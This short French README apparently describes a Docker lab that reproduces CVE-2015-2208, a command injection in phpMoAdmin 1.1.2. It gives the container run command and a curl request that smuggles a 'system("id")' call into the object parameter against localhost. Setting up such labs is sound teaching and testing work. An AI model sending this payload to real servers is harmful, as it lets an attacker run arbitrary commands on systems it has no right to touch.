
Docker simulant la vulnérabilité cve-2015-2208
#Dockerfile pour simuler l'environnement pour CVE-2015-2208#
La fonction saveObject dans moadmin.php de phpMoAdmin 1.1.2 permet à des attaquants distants d'exécuter des commandes arbitraires via des métacaractères shell dans le paramètre object.
Découvert par : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
Références :
##Environnement de test##
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208
##Exploitation##
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'